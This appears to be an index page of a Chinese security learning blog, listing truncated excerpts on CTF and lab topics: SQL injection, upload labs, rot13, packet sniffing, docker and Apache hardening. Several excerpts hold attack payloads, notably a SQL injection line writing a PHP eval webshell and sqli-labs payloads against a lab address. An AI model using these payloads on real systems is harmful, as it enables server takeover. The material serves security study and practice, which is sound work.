SQL注入写webshell 传统的sql语句写shell通过sql注入select into outfile实现，如： 1' union select 1,'<?php eval($_POST[a]);?>&#

防止服务器端目录遍历 Apache 修改站点目录对应的配置文件 原 <Directory /> Options +Indexes +FollowSymLinks # 将 "+" 与 Indexe

UPLOAD-LABS记录 pass1源码 function checkFile() { var file = document.getElementsByName('upload_file')[0].va

rot13rot13是凯撒的一种变种，仅仅只需要检查字母顺序并取代它在13位之后的对应字母 python实现 # -*-coding:utf-8-*- def rot13_decode(s): res=""

sqli-lab Less1-6 less-1 判断列数 payload : http://172.16.43.117/sql/Less-1/?id=-1' order by 3 --+ 回显正常 payload : http:

DDCTF-WEB1 首先观察链接发现可能存在文件包含，且jpg参数是经过一次base16，两次base64加密后的，所以构造payload读取index.php base64解码后得到index.php <?php /* * h

CTF学习前言本内容主要以解题模式为学习重点，由Stalker-16成员(Danie1,7iny)整理。 day01–7iny解题模式CTF赛题目类别与能力对应· Web-Web应用的漏洞挖掘和利用· PWN-逆向分析、漏洞挖掘、漏洞

SEEDLAB_Packet Sniffing and Spoofing Lab Capture only the ICMP packet#-*-coding:utf-8-*- from scapy.all import * def

docker容器的基本操作 启动容器 docker run IMAGE [COMMAND] [ARG…] run 在新容器中执行命令 启动交互式容器 docker run -i -t IMAGE /bin/bash -i –inte